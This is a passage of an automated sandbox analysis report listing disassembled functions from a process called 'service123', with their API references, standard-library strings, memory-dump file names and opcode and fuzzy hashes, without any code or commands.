Opcode Fuzzy Hash: e1defb74bcb87c46262d6c833bea3bc43e165b7fa2c99aa4c86cd48a39e7e0e6
Instruction Fuzzy Hash: 581151B19153148FCB10EF2CD480CAABBE4EF45254B42096DE8C89B315D336D955CF92

Function 6C3B96A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C3BA0BE

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2b32a7f5865121a0e1c29f45ac8a0475e27f6d2157b0c8a160b5f6d9c577ccb9
Instruction ID: f3511d6bbdd726f086588e82dd80ed7224363e0399bff010a98458abc387a0dd
Opcode Fuzzy Hash: 2b32a7f5865121a0e1c29f45ac8a0475e27f6d2157b0c8a160b5f6d9c577ccb9
Instruction Fuzzy Hash: 72A28F70A087558FDB10CF69C48478DBBF2BF66324F288658D869ABA92D731DC45CF90

Function 6C3B8570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C3B8F8E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 387803944dd526a414954e206f3c544e2f8d752c5bd374ebd32ad386b55502c0
Instruction ID: f8f382a6f05f356aa1a09becf9e03c9c695293f85d05d55b74e17928e5cf29e6
Opcode Fuzzy Hash: 387803944dd526a414954e206f3c544e2f8d752c5bd374ebd32ad386b55502c0
Instruction Fuzzy Hash: 09A28071A0435A8FDB10CF68C48478DBBB2BF65328F288659D869AFA91C731DC45CF91

Function 6C3F3440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C3F34C0

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: d3866bf18122f6f3ad95d7933493d9e4a2f49fe4cb73cfcc964f4a5709612bfb
Instruction ID: d2f7c42098768e7d27c34266a18503f219b647869ffd15a1fdfe39528e129eed
Opcode Fuzzy Hash: d3866bf18122f6f3ad95d7933493d9e4a2f49fe4cb73cfcc964f4a5709612bfb
Instruction Fuzzy Hash: 8A015EB15093419BC341AF6A8184A1BFFE4AF91258F948C6DE4E847B11C736D4498F67

Function 6C3AA720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3AA73D

Strings

basic_string: construction from null is not valid, xrefs: 6C3AA760

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: f06a47d0c0e4107bcdc55fcc097f2c84b78f9a0e27cf1344797fc8befdb22120
Instruction ID: 46e2dccff297e67006e9ed603c2c3549858754d85730f1a9fa8b731dd374cc25
Opcode Fuzzy Hash: f06a47d0c0e4107bcdc55fcc097f2c84b78f9a0e27cf1344797fc8befdb22120
Instruction Fuzzy Hash: 0AF03AB19153148FCB00EF6CC480CAAB7F4EB45214B4248ADE8889B715E236E959CF92

Function 6C3AA330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3AA34D

Strings

basic_string: construction from null is not valid, xrefs: 6C3AA370

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: f06a47d0c0e4107bcdc55fcc097f2c84b78f9a0e27cf1344797fc8befdb22120
Instruction ID: e978132d02f63a9443d4a8438aa330d885c411042dd5a769e252927cd308b070
Opcode Fuzzy Hash: f06a47d0c0e4107bcdc55fcc097f2c84b78f9a0e27cf1344797fc8befdb22120
Instruction Fuzzy Hash: FEF03AB19153148FCB00EF2CC480C9AB7E4EB46254B4208ADE8889B715E236E959CF92

Function 00CB83F5 Relevance: 3.0, APIs: 2, Instructions: 25encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32 ref: 00CB8390
CryptReleaseContext.ADVAPI32 ref: 00CB83B3

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: Crypt$ContextRandomRelease
String ID:
API String ID: 3163166064-0
Opcode ID: 616b4a519a4ef7c0d47c2900f27bdc18b71e4b7ed3c0fe01fd16c698256ee2af
Instruction ID: a8f35673f8eca614d03421824b59a78239027b0667003574b0b0ce88955d8e4c
Opcode Fuzzy Hash: 616b4a519a4ef7c0d47c2900f27bdc18b71e4b7ed3c0fe01fd16c698256ee2af
Instruction Fuzzy Hash: FAF01CB4409341DEDB10EF78E94876E7BF4AB84B01F10851DE98983260F77DC949CB52

Function 6C3A04F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C3A0548
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3A0550

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 003fe86a9a4ce3eba87c96fb24ef6c81f6c73ad6d73b6d4cf304bec717cc894d
Instruction ID: 27a56ee881c88d36f78307feadff2f2f7d0675d7abacb5b7589b04c77861def4
Opcode Fuzzy Hash: 003fe86a9a4ce3eba87c96fb24ef6c81f6c73ad6d73b6d4cf304bec717cc894d
Instruction Fuzzy Hash: 3C0146B2A0A3409FD704CF29D881A9AFBE1FBC9710F14992DE488D7700C234D8458B87

Function 6C3AC2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3AC320
basic_string::substr, xrefs: 6C3AC318

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 644171423389f5d2b18034fb411ccb8040ec59fd53e83b6a91f44ef9085f0116
Instruction ID: f3749d9d8b9a323317f1c5841588bf1d85230f4f887afaa55a695d39dcaf39bd
Opcode Fuzzy Hash: 644171423389f5d2b18034fb411ccb8040ec59fd53e83b6a91f44ef9085f0116
Instruction Fuzzy Hash: E1015671A082108BCB04DF29D48092AFBE1FBC9304F6489ADE4889B314D631D845CB86

Function 6C3C4490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541fb304cafb566f00e91e56c463402f9946ecaa6732b91b4954a142cf53a37c
Instruction ID: be4d56b86f1733c7368c8740ad45ac81318a0280bef838bd9e99643b367159db
Opcode Fuzzy Hash: 541fb304cafb566f00e91e56c463402f9946ecaa6732b91b4954a142cf53a37c
Instruction Fuzzy Hash: 82828C75E042988FDB10CFA8C4807ADBBF1AF45328F298259E865AB795C335DC45CF92

Function 6C3C2A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9170093d44b29c3ce84d110f0cd6d03d1b586d7399e53792e08f2c60331b9e2a
Instruction ID: 4c273ae9773de4677cccd9b4c68634613a224b11240d79d893aaecd3c2e76d3b
Opcode Fuzzy Hash: 9170093d44b29c3ce84d110f0cd6d03d1b586d7399e53792e08f2c60331b9e2a
Instruction Fuzzy Hash: 59729D70B08299CFDB11CFA8C58878DBBF1AF0A318F148659D4A5AB791C336AC45CF52

Function 6C3C11BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939366a460a04f79d81fbaaee03e8c629b81139e58df0d683acd20403da85729
Instruction ID: fb7f2c4519d28666720ef288aec62afca8cd19ef3d4eb17adc259a72fd9e4695
Opcode Fuzzy Hash: 939366a460a04f79d81fbaaee03e8c629b81139e58df0d683acd20403da85729
Instruction Fuzzy Hash: E0727C74B092988FDB10CFA8C48478DBBF1AF06318F188659D4A5ABB91D335EC45DF92

Function 6C3C1E40 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99caa9a5cda836e700774a155e10705ee1999a26cc27773dd831c66ee0c265e
Instruction ID: 3aea56f9fa2bf8e271f9079233d4281bbc8554d5348978095d5959f52880f559
Opcode Fuzzy Hash: e99caa9a5cda836e700774a155e10705ee1999a26cc27773dd831c66ee0c265e
Instruction Fuzzy Hash: 6F728B70A09398CFDB11CFA8C588B8DBBF1AF06318F148659D4A5AB781C776AC45CF52

Function 6C3C0580 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ece48ba155a7fc599b5c158dc755bef5b06239f8ce65f2e374803d50f95eaa
Instruction ID: 7d594a85c873fb4a0b3d7b02cb0ec36f2970af5ec40d23a9f21956e09e3eebf2
Opcode Fuzzy Hash: 26ece48ba155a7fc599b5c158dc755bef5b06239f8ce65f2e374803d50f95eaa
Instruction Fuzzy Hash: ED7269B4A093D88FDB10CFA8C48478DBBF1AF46318F288659D4A5AB791C735AC45CF52

Function 6C3AF510 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3AF663

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 0ed3815b6868f5789afb42050c0c37fe5f7a03cb9e9d58727846729c9da9b036
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 63724574A042588FCB04DFA8C084A9DBBF2FF4D314F288659E865AB7A1C735AC56CF51

Function 6C3C77D0 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce3fb23dfe24120a206f0e55bbc2298afc153faeb984ca3a637a426e577aff79
Instruction ID: 61d09dd054fa0e647a974b14bea5db3edee17bf2c4dace92084fffe6257306e1
Opcode Fuzzy Hash: ce3fb23dfe24120a206f0e55bbc2298afc153faeb984ca3a637a426e577aff79
Instruction Fuzzy Hash: D252AE70A042589FDB00CF68C4C479DBBF1AF46328F28865AE864AB791D736DD45CF92

Function 6C3B2110 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: ed5b4581159b8a1194b9cf24ed1ecc348cac5da5d0b6bd047bc1b046ac1251ec
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: A9E16975E052598FCB01CFA8C58468DBBF2AF59314F188365E465BBB91C336AD41CFA0

Function 6C3DDA20 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 78c06e1af0557c0904d57e8faf3a977b77ae7d0af5edcf0bf1ab842c4f0b560b
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: D9D16E72A042598FCB01CF68D4806DDBBF1BF49328F1A8265E865AB791D335E945CFA0

Function 6C3D9910 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6C3D99A8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 06541867c661cf134cd0d0a984d96ecad4a31765ab32bb637b4528f6dd13e053
Instruction ID: df913c993da58160a9bd0bec52e439a256441b0dd09ff761966dad5208dfc845
Opcode Fuzzy Hash: 06541867c661cf134cd0d0a984d96ecad4a31765ab32bb637b4528f6dd13e053
Instruction Fuzzy Hash: DB2130726093048FCB14EF75D88499FBBF5AB89208F11892DD8808B755DB31E84ACFD2

Function 6C39E8C0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C39E900

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: aaf7a8fc93b02c53a0867db38517a41eb9ec0a11ef26ebd71cff19d0d61ecbf0
Instruction ID: 84342d3542996016bd07de5a1e81bfdd33047ebcfd2ce8304dafc31dd47ad279
Opcode Fuzzy Hash: aaf7a8fc93b02c53a0867db38517a41eb9ec0a11ef26ebd71cff19d0d61ecbf0
Instruction Fuzzy Hash: 95E012B6D082018B8708EE75D58542BBBB16789100F409918D84247B48E630D1488F97

Function 6C3A0010 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C3A0030

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: afe0f759f0e6341e8f5954b07b431b8b3187d8cacbbfdde88e28f80502fc9a8b
